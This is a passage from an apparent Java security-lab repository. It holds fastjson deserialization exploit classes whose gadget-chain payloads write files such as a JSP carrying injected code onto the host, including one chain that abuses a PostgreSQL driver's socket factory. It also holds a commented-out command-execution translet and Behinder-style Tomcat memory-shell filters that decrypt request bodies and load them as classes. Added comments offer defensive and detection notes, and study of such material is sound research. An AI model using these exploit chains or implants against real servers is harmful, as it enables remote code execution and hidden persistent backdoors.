            + " }\r\n"
            + " }\r\n"
            + " }";
        String poc3 = "{\r\n"
            + " \"su14\": {\r\n"
            + " \"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
            + " \"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
            + " \"nodeIter\": {\r\n"
            + " \"@type\": \"org.apache.xpath.NodeSet\"\r\n"
            + " },\r\n"
            + " \"xctxt\": {\r\n"
            + " \"@type\": \"org.apache.xpath.XPathContext\",\r\n"
            + " \"primaryReader\": {\r\n"
            + " \"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
            + " \"entityResolver\": {\r\n"
            + " \"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
            + " \"inputSource\": {\r\n"
            + " \"byteStream\": {\r\n"
            + " \"@type\": \"java.io.InputStream\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}";

        // poc4: the writer target "1.jsp" is the file written on the host when this parses.
        // Differs from Fastjson29 in the XmlStreamReader field name ("inputStream") and in the
        // explicit "start"/"end" bounds on the CharSequenceReader.
        String poc4 = "{\r\n"
            + " \"su16\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"inputStream\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
            + " \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\",\r\n"
            + " \"start\":0,\r\n"
            + " \"end\":2147483647\r\n"
            + " },\r\n"
            + " \"charsetName\":\"UTF-8\",\r\n"
            + " \"bufferSize\":1024\r\n"
            + " },\r\n"
            + " \"branch\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
            + " \"writer\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
            + " \"file\":\"1.jsp\",\r\n"
            + " \"charsetName\":\"UTF-8\",\r\n"
            + " \"append\": false\r\n"
            + " },\r\n"
            + " \"charsetName\":\"UTF-8\",\r\n"
            + " \"bufferSize\": 1024,\r\n"
            + " \"writeImmediately\": true\r\n"
            + " },\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\":\"text/xml\",\r\n"
            + " \"lenient\":false,\r\n"
            + " \"defaultEncoding\":\"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36,82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"su17\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"inputStream\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\":{\"$ref\": \"$.su16.delegate.reader.inputStream.input\"},\r\n"
            + " \"branch\":{\"$ref\": \"$.su16.delegate.reader.inputStream.branch\"},\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\":\"text/xml\",\r\n"
            + " \"lenient\":false,\r\n"
            + " \"defaultEncoding\":\"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36,82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"su18\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"inputStream\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\":{\"$ref\": \"$.su16.delegate.reader.inputStream.input\"},\r\n"
            + " \"branch\":{\"$ref\": \"$.su16.delegate.reader.inputStream.branch\"},\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\":\"text/xml\",\r\n"
            + " \"lenient\":false,\r\n"
            + " \"defaultEncoding\":\"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36,82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"su19\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"inputStream\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\":{\"$ref\": \"$.su16.delegate.reader.inputStream.input\"},\r\n"
            + " \"branch\":{\"$ref\": \"$.su16.delegate.reader.inputStream.branch\"},\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\":\"text/xml\",\r\n"
            + " \"lenient\":false,\r\n"
            + " \"defaultEncoding\":\"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36,82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " } \r\n"
            + " }\r\n"
            + "\r\n"
            + "";

        System.out.println(poc1);
        System.out.println(poc2);
        System.out.println(poc3);
        System.out.println(poc4);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e) {
            // Exception discarded (empty catch in the original); poc2-poc4 are parsed regardless.
        }
        JSON.parseObject(poc2);
        JSON.parseObject(poc3);
        JSON.parseObject(poc4);

    }
}
208 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson31_xalan_dom4j_io_write_4.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.InputStream;
3 | import java.net.URL;
4 | import java.util.Arrays;
5 | import java.util.Base64;
6 |
7 | import com.alibaba.fastjson.JSON;
8 |
9 |
/**
 * Lab PoC: reads a local file, base64-encodes it, embeds the result in poc4 and parses
 * four payloads. poc4 names {@code org.eclipse.core.internal.localstore.SafeFileOutputStream}
 * with {@code "targetPath": "1.txt"}, so a successful parse writes {@code 1.txt} into the
 * JVM's working directory. Run only on a disposable host.
 * <p>
 * Defensive note: as with the sibling PoCs, the root issue is parsing attacker-controlled
 * JSON carrying {@code @type} on an affected fastjson build; upgrading or enabling
 * fastjson's safeMode (which ignores {@code @type} altogether) removes it. An unexpected
 * {@code 1.txt} in the application's working directory is the observable artefact here.
 */
public class Fastjson31_xalan_dom4j_io_write_4 {
    /**
     * Reads the source file, builds the payloads, prints them, and parses them in order.
     *
     * @param args unused
     * @throws Exception from opening/reading the source file, or from parsing poc2-poc4;
     *         poc1's exception is discarded by the empty catch
     */
    public static void main(String[] args) throws Exception {
        // Source file whose contents are embedded into poc4 (a local lab path).
        String url = "file:///D:/Downloads/1.txt";
        InputStream input = new URL(url).openStream();
        // NOTE(review): available() is an estimate, not the file length, and read() may
        // return fewer bytes than requested, so bs can be partially filled; the stream is
        // also never closed.
        byte[] bs = new byte[input.available()];
        input.read(bs);
        // Base64 text of the file contents; getBytes() uses the platform default charset,
        // which is harmless here only because base64 output is ASCII.
        String test = Base64.getEncoder().encodeToString(bs);
        byte[] testbs = test.getBytes();

        // Dependencies: fastjson 1.2.73-1.2.80, xalan-2.7.2, dom4j-2.1.3, commons-io-2.2, aspectjtools-1.9.6, commons-codec-1.6
        // Author's note: this chain mainly addresses the inability of io chains 1-3 to write
        // complex file structures; the file still has to be larger than 8 KB to be written.
        String poc1 = "{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
            + "}";
        String poc2 = "{\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
            + " \"locator\": {}\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }";
        String poc3 = "{\r\n"
            + " \"su14\": {\r\n"
            + " \"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
            + " \"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
            + " \"nodeIter\": {\r\n"
            + " \"@type\": \"org.apache.xpath.NodeSet\"\r\n"
            + " },\r\n"
            + " \"xctxt\": {\r\n"
            + " \"@type\": \"org.apache.xpath.XPathContext\",\r\n"
            + " \"primaryReader\": {\r\n"
            + " \"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
            + " \"entityResolver\": {\r\n"
            + " \"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
            + " \"inputSource\": {\r\n"
            + " \"byteStream\": {\r\n"
            + " \"@type\": \"java.io.InputStream\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}";

        // poc4: embeds the base64 text twice (as the "s" string and as its byte values under
        // "boms"); the branch target "1.txt" is the file written on the host when this parses.
        String poc4 = "{\r\n"
            + " \"su16\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\":{\r\n"
            + " \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n"
            + " \"in\":{\r\n"
            + " \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n"
            + " \"charset\":\"utf-8\",\r\n"
            + " \"bufferSize\": 1024,\r\n"
            + " \"s\":{\"@type\":\"java.lang.String\"\""+test+"\"\r\n"
            + " },\r\n"
            + " \"doEncode\":false,\r\n"
            + " \"lineLength\":1024,\r\n"
            + " \"lineSeparator\":\"5ZWKCg==\",\r\n"
            + " \"decodingPolicy\":0\r\n"
            + " },\r\n"
            + " \"branch\":{\r\n"
            + " \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n"
            + " \"targetPath\":\"1.txt\"\r\n"
            + " },\r\n"
            + " \"closeBranch\":true\r\n"
            + " },\r\n"
            + " \"include\":true,\r\n"
            + " \"boms\":[{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\":"+Arrays.toString(testbs)+"\r\n"
            + " }],\r\n"
            + "},\r\n"
            + " \"su17\": {\r\n"
            + " \"$ref\": \"$.su16.bOM.bytes\"\r\n"
            + " }\r\n"
            + " }";

        System.out.println(poc1);
        System.out.println(poc2);
        System.out.println(poc3);
        System.out.println(poc4);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e) {
            // Exception discarded (empty catch in the original); poc2-poc4 are parsed regardless.
        }
        JSON.parseObject(poc2);
        JSON.parseObject(poc3);
        JSON.parseObject(poc4);

    }
}
114 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson32_python_pgsql.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import com.alibaba.fastjson.JSON;
3 |
/**
 * Lab PoC: parses three hand-built JSON documents. poc3 describes an
 * {@code org.postgresql.jdbc.PgConnection} pointed at 127.0.0.1:2333 whose
 * {@code socketFactory} is {@code java.io.FileOutputStream} with {@code socketFactoryArg}
 * {@code "1.txt"}, so a parse attempt is presumably expected to create or truncate
 * {@code 1.txt} in the JVM's working directory (confirm against the driver). Run only on
 * a disposable host.
 * <p>
 * Defensive note: the root issue is parsing attacker-controlled JSON carrying
 * {@code @type} on an affected fastjson build; upgrading or enabling fastjson's safeMode
 * (which ignores {@code @type} altogether) removes it. A JDBC driver being handed an
 * arbitrary class name as its socket factory is the second link worth blocking: do not
 * let untrusted input reach connection properties.
 */
public class Fastjson32_python_pgsql {
    /**
     * Builds the payloads, prints them, and parses them in order. Unlike the sibling PoCs,
     * poc1 is parsed unguarded here and it is poc2 whose exception is discarded.
     *
     * @param args unused
     */
    public static void main(String[] args){

        // Dependencies: fastjson 1.2.76-1.2.80, rhq-scripting-python-4.13.0 (very obscure) / postgresql-42.3.1;
        // the author notes pgsql can be swapped for mysql.
        String poc1 ="{\r\n"
            + " \"@type\":\"java.lang.Exception\",\r\n"
            + " \"@type\":\"org.python.antlr.ParseException\"\r\n"
            + "}";


        String poc2 = "{\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.python.antlr.ParseException\",\r\n"
            + " \"type\": \"{\\\"@type\\\":\\\"com.ziclix.python.sql.PyConnection\\\",\\\"connection\\\":{\\\"@type\\\":\\\"org.postgresql.jdbc.PgConnection\\\"}}\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}";

        // poc3: connection properties name java.io.FileOutputStream as the socket factory
        // with "1.txt" as its argument.
        String poc3 = "{\r\n"
            + " \"@type\": \"org.postgresql.jdbc.PgConnection\",\r\n"
            + " \"hostSpecs\": [{\r\n"
            + " \"host\": \"127.0.0.1\",\r\n"
            + " \"port\": 2333\r\n"
            + " }],\r\n"
            + " \"user\": \"test\",\r\n"
            + " \"database\": \"test\",\r\n"
            + " \"info\": {\r\n"
            + " \"socketFactory\": \"java.io.FileOutputStream\",\r\n"
            + " \"socketFactoryArg\": \"1.txt\"\r\n"
            + " },\r\n"
            + " \"url\": \"\"\r\n"
            + "}";



        System.out.println(poc1);
        System.out.println(poc2);
        System.out.println(poc3);

        JSON.parseObject(poc1);
        try {
            JSON.parseObject(poc2);
        } catch (Exception e) {
            // Exception discarded (empty catch in the original); poc3 is parsed regardless.
        }

        JSON.parseObject(poc3);

    }
}
63 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/TemplatesImplcmd.java:
--------------------------------------------------------------------------------
1 | //package com.shiro.vuln.fastjson;
2 | //
3 | //import com.sun.org.apache.xalan.internal.xsltc.DOM;
4 | //import com.sun.org.apache.xalan.internal.xsltc.TransletException;
5 | //import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
6 | //import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
7 | //import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
8 | //
9 | //public class TemplatesImplcmd extends AbstractTranslet {
10 | // public TemplatesImplcmd() throws Exception {
11 | // Runtime.getRuntime().exec("calc");
12 | // }
13 | // @Override
14 | // public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
15 | // }
16 | // @Override
17 | // public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
18 | // }
19 | //}
20 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/filter/MemBehinder3.java:
--------------------------------------------------------------------------------
1 | /*
2 | package com.shiro.vuln.filter;
3 |
4 | //
5 | // Source code recreated from a .class file by IntelliJ IDEA
6 | // (powered by FernFlower decompiler)
7 | //
8 |
9 | import org.apache.catalina.LifecycleState;
10 | import org.apache.catalina.core.ApplicationContext;
11 | import org.apache.catalina.core.StandardContext;
12 | import org.apache.catalina.util.LifecycleBase;
13 | import sun.misc.BASE64Decoder;
14 |
15 | import javax.crypto.Cipher;
16 | import javax.crypto.spec.SecretKeySpec;
17 | import javax.servlet.*;
18 | import javax.servlet.annotation.WebFilter;
19 | import javax.servlet.http.HttpServletRequest;
20 | import javax.servlet.http.HttpServletResponse;
21 | import javax.servlet.http.HttpSession;
22 | import java.io.IOException;
23 | import java.lang.reflect.Field;
24 | import java.lang.reflect.Method;
25 | import java.math.BigInteger;
26 | import java.security.MessageDigest;
27 | import java.util.EnumSet;
28 | import java.util.HashMap;
29 |
30 | //@WebFilter
31 | public class MemBehinder3 extends ClassLoader implements Filter {
32 | public String passwd = "shell@2021";
33 | public String tpath = "/favicon.ico";
34 | public String cs = "UTF-8";
35 | public HttpServletRequest request = null;
36 | public HttpServletResponse response = null;
37 |
38 | public MemBehinder3(ClassLoader var1) {
39 | super(var1);
40 | }
41 |
42 | public MemBehinder3() {
43 | }
44 |
45 | public void init(FilterConfig var1) throws ServletException {
46 | }
47 |
48 | public static String md5(String var0) {
49 | String var1 = null;
50 |
51 | try {
52 | MessageDigest var2 = MessageDigest.getInstance("MD5");
53 | var2.update(var0.getBytes(), 0, var0.length());
54 | var1 = (new BigInteger(1, var2.digest())).toString(16).toUpperCase();
55 | } catch (Exception var4) {
56 | }
57 |
58 | return var1.substring(0, 16).toLowerCase();
59 | }
60 |
61 | public Class g(byte[] var1) {
62 | return super.defineClass(var1, 0, var1.length);
63 | }
64 |
65 | public void parseObj(Object var1) {
66 | if (var1.getClass().isArray()) {
67 | Object[] var2 = (Object[])((Object[])var1);
68 | this.request = (HttpServletRequest)var2[0];
69 | this.response = (HttpServletResponse)var2[1];
70 | } else {
71 | try {
72 | Class var3 = Class.forName("javax.servlet.jsp.PageContext");
73 | this.request = (HttpServletRequest)var3.getDeclaredMethod("getRequest", (Class[])null).invoke(var1, (Object[])null);
74 | this.response = (HttpServletResponse)var3.getDeclaredMethod("getResponse", (Class[])null).invoke(var1, (Object[])null);
75 | } catch (Exception var12) {
76 | if (var1 instanceof HttpServletRequest) {
77 | this.request = (HttpServletRequest)var1;
78 |
79 | try {
80 | Field var5 = this.request.getClass().getDeclaredField("request");
81 | var5.setAccessible(true);
82 | HttpServletRequest var6 = (HttpServletRequest)var5.get(this.request);
83 | Field var7 = var6.getClass().getDeclaredField("response");
84 | var7.setAccessible(true);
85 | this.response = (HttpServletResponse)var7.get(var6);
86 | } catch (Exception var11) {
87 | try {
88 | this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse", (Class[])null).invoke(var1, (Object[])null);
89 | } catch (Exception var10) {
90 | }
91 | }
92 | }
93 | }
94 | }
95 |
96 | }
97 |
98 | public void doFilter(ServletRequest var1, ServletResponse var2, FilterChain var3) throws IOException, ServletException {
99 | HttpServletRequest var4 = (HttpServletRequest)var1;
100 | HttpServletResponse var5 = (HttpServletResponse)var2;
101 | HttpSession var6 = var4.getSession();
102 | HashMap var7 = new HashMap();
103 | var7.put("request", var4);
104 | var7.put("response", var5);
105 | var7.put("session", var6);
106 | System.out.println(111);
107 | var5.setHeader("inject", "success");
108 | String var8 = md5(this.passwd);
109 | var6.putValue("u", var8);
110 |
111 | try {
112 | Cipher var9 = Cipher.getInstance("AES");
113 | SecretKeySpec var10 = new SecretKeySpec(var8.getBytes(), "AES");
114 | var9.init(2, var10);
115 | String var11 = var4.getReader().readLine();
116 | Method var12 = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
117 | var12.setAccessible(true);
118 | byte[] var13 = var9.doFinal((new BASE64Decoder()).decodeBuffer(var11));
119 | Class var14 = (Class)var12.invoke(this.getClass().getClassLoader(), var13, new Integer(0), new Integer(var13.length));
120 | var14.newInstance().equals(var7);
121 | } catch (Exception var16) {
122 | var16.printStackTrace();
123 | }
124 |
125 | var3.doFilter(var4, var5);
126 | }
127 |
128 | public void destroy() {
129 | }
130 |
131 | public static String addFilter(Filter var0, String var1, String var2, HttpServletRequest var3) throws IllegalAccessException {
132 | ServletContext var4 = var3.getServletContext();
133 | if (var4.getFilterRegistration(var1) == null) {
134 | Field var5 = null;
135 | ApplicationContext var6 = null;
136 | StandardContext var7 = null;
137 | Field var8 = null;
138 | FilterRegistration.Dynamic var9 = null;
139 |
140 | String var10;
141 | try {
142 | var5 = var4.getClass().getDeclaredField("context");
143 | var5.setAccessible(true);
144 | var6 = (ApplicationContext)var5.get(var4);
145 | var5 = var6.getClass().getDeclaredField("context");
146 | var5.setAccessible(true);
147 | var7 = (StandardContext)var5.get(var6);
148 | var8 = LifecycleBase.class.getDeclaredField("state");
149 | var8.setAccessible(true);
150 | var8.set(var7, LifecycleState.STARTING_PREP);
151 | var9 = var4.addFilter(var1, var0);
152 | var9.addMappingForUrlPatterns(EnumSet.of(DispatcherType.REQUEST), false, new String[]{var2});
153 | Method var11 = StandardContext.class.getMethod("filterStart", (Class[])null);
154 | var11.setAccessible(true);
155 | var11.invoke(var7, (Object[])null);
156 | var8.set(var7, LifecycleState.STARTED);
157 | var10 = null;
158 |
159 | Class var12;
160 | try {
161 | var12 = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
162 | } catch (Exception var26) {
163 | var12 = Class.forName("org.apache.catalina.deploy.FilterMap");
164 | }
165 |
166 | if (var12 != null) {
167 | Method var14 = var7.getClass().getMethod("findFilterMaps", (Class[])null);
168 | Object[] var15 = (Object[])var14.invoke(var7, (Object[])null);
169 | Object[] var16 = new Object[var15.length];
170 | int var17 = 1;
171 |
172 | for(int var18 = 0; var18 < var15.length; ++var18) {
173 | Object var19 = var15[var18];
174 | var14 = var12.getMethod("getFilterName", (Class[])null);
175 | String var20 = (String)var14.invoke(var19, (Object[])null);
176 | if (var20.equalsIgnoreCase(var20)) {
177 | var16[0] = var19;
178 | } else {
179 | var16[var17++] = var15[var18];
180 | }
181 | }
182 |
183 | System.arraycopy(var16, 0, var15, 0, var15.length);
184 | }
185 |
186 | String var21 = "inject success";
187 | return var21;
188 | } catch (Exception var27) {
189 | var10 = var27.getMessage();
190 | } finally {
191 | var8.set(var7, LifecycleState.STARTED);
192 | }
193 |
194 | return var10;
195 | } else {
196 | return "Filter already exists";
197 | }
198 | }
199 |
200 | public boolean equals(Object var1) {
201 | this.parseObj(var1);
202 | StringBuffer var2 = new StringBuffer();
203 | String var3 = "->|";
204 | String var4 = "|<-";
205 |
206 | try {
207 | this.response.setContentType("text/html");
208 | this.request.setCharacterEncoding(this.cs);
209 | this.response.setCharacterEncoding(this.cs);
210 | var2.append(addFilter(this, "MemBehinder387532587899179", "this.tpath", this.request));
211 | } catch (Exception var8) {
212 | var2.append("ERROR:// " + var8.toString());
213 | }
214 |
215 | try {
216 | this.response.getWriter().print(var3 + var2.toString() + var4);
217 | this.response.getWriter().flush();
218 | this.response.getWriter().close();
219 | } catch (Exception var7) {
220 | }
221 |
222 | return true;
223 | }
224 | }
225 | */
226 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/filter/MemBehinderFilter.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.filter;
2 |
3 | import org.apache.catalina.LifecycleState;
4 | import org.apache.catalina.core.ApplicationContext;
5 | import org.apache.catalina.core.StandardContext;
6 | import org.apache.catalina.util.LifecycleBase;
7 |
8 | import javax.crypto.Cipher;
9 | import javax.crypto.spec.SecretKeySpec;
10 | import javax.servlet.*;
11 | import javax.servlet.annotation.WebFilter;
12 | import javax.servlet.http.HttpServletRequest;
13 | import javax.servlet.http.HttpServletResponse;
14 | import javax.servlet.http.HttpSession;
15 | import java.io.IOException;
16 | import java.lang.reflect.Field;
17 | import java.lang.reflect.Method;
18 | import java.math.BigInteger;
19 | import java.security.MessageDigest;
20 | import java.util.EnumSet;
21 | import java.util.HashMap;
22 | import java.util.Map;
23 |
/**
 * "New Behinder (冰蝎) memory shell" (translated from the original Chinese heading):
 * a Tomcat in-memory filter implant, kept in this lab as a specimen.
 *
 * What the code visible here does, for defenders reading it:
 * <ul>
 *   <li>It is a servlet {@link Filter} that also extends {@link ClassLoader}, so it can turn
 *       arbitrary bytes into a loaded class via {@link #g(byte[])}.</li>
 *   <li>{@link #addFilter()} registers this object as a filter at runtime. Name and URL pattern
 *       both come from {@link #path}, which {@link #equals(Object)} takes from the request header
 *       {@code path}. Before registering it rewinds Tomcat's {@code LifecycleBase.state} field to
 *       {@code STARTING_PREP} by reflection, and afterwards moves its own {@code FilterMap} to the
 *       front of the context's filter maps.</li>
 *   <li>{@link #doFilter} base64-decodes and AES-decrypts the first line of the request body with a
 *       key derived from the {@code p} header via {@link #md5(String)}, defines the plaintext as a
 *       class in a fresh loader, instantiates it and calls {@code equals(ctx)} on it. It never
 *       calls {@code chain.doFilter}.</li>
 * </ul>
 *
 * Detection hooks grounded in this code: a Filter whose class extends ClassLoader; reflective
 * writes to {@code org.apache.catalina.util.LifecycleBase#state}; {@code ServletContext.addFilter}
 * invoked after the context has started; a filter mapping equal to a request header value;
 * session attribute {@code "u"} holding the derived key; stack traces printed to stderr for any
 * failure in {@link #doFilter} (e.g. when a request body does not decrypt).
 */
public final class MemBehinderFilter extends ClassLoader implements Filter {
    // Both are populated by parseObj() from whatever object the caller hands in;
    // they stay null if none of the extraction strategies apply.
    public HttpServletRequest request = null;
    public HttpServletResponse response = null;
    // Charset name applied to request and response in equals().
    public String cs = "UTF-8";
    // AES key material (16 chars -> 128-bit key). Overwritten in equals() with md5(header "p").
    public String Pwd = "eac9fa38330a7535";
    // Used as both the filter name and the URL pattern in addFilter(). Overwritten in equals()
    // with the value of header "path".
    public String path = "/favicondemo.ico";

    public MemBehinderFilter() {
    }

    // Parent-loader constructor. doFilter() passes this class's own loader, presumably so the
    // class defined from the decrypted payload can resolve servlet/Tomcat types — confirm.
    public MemBehinderFilter(ClassLoader c) {
        super(c);
    }

    // Exposes the protected ClassLoader.defineClass: any byte[] becomes a class in this loader.
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }

    /**
     * Returns the first 16 hex digits of the MD5 of {@code s}, or {@code null} on any failure
     * (the catch swallows everything, including a null {@code s}).
     * Caveats visible in the code: the update passes {@code s.length()} (a char count) as the byte
     * length and uses the platform default charset, so only ASCII input is digested in full;
     * {@code BigInteger.toString(16)} drops leading zero nibbles, so the hex string is not
     * fixed-width.
     */
    public static String md5(String s) {
        String ret = null;

        try {
            MessageDigest m = MessageDigest.getInstance("MD5");
            m.update(s.getBytes(), 0, s.length());
            ret = (new BigInteger(1, m.digest())).toString(16).substring(0, 16);
        } catch (Exception var3) {
        }

        return ret;
    }

    /**
     * Not an equality test. This is the implant's entry point, presumably invoked reflectively as
     * {@code instance.equals(ctx)} by a loader stage like the one in {@link #doFilter} — confirm.
     * It resolves request/response from {@code obj}, derives the AES key from header {@code p} and
     * the filter path from header {@code path}, registers itself via {@link #addFilter()}, and
     * writes the outcome to the response between the {@code ->|} and {@code |<-} markers.
     * Always returns {@code true}; registration errors are reported in the body, write failures
     * are silently ignored. hashCode is not overridden, so the equals/hashCode contract is broken
     * by design here.
     */
    public boolean equals(Object obj) {
        this.parseObj(obj);
        // A missing "p" header makes md5(null) return null, so Pwd becomes null.
        this.Pwd = md5(this.request.getHeader("p"));
        this.path = this.request.getHeader("path");
        StringBuffer output = new StringBuffer();
        String tag_s = "->|";
        String tag_e = "|<-";

        try {
            this.response.setContentType("text/html");
            this.request.setCharacterEncoding(this.cs);
            this.response.setCharacterEncoding(this.cs);
            output.append(this.addFilter());
        } catch (Exception var7) {
            output.append("ERROR:// " + var7.toString());
        }

        try {
            this.response.getWriter().print(tag_s + output.toString() + tag_e);
            this.response.getWriter().flush();
            this.response.getWriter().close();
        } catch (Exception var6) {
        }

        return true;
    }

    /**
     * Resolves {@link #request} and {@link #response} from {@code obj}, trying in order:
     * an {@code Object[]} of {request, response}; a JSP {@code PageContext} (via its
     * getRequest/getResponse, looked up reflectively); an {@link HttpServletRequest}, whose
